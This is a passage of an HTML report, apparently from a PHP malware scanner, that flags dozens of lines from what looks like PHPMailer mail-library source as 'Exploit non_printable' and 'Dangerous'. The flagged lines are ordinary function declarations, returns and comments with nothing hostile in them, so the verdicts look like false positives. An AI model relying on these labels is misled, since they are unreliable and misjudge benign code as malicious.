<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1814</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1877</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2011</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2078</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2662</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2678</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2722</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2757</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2787</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2830</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
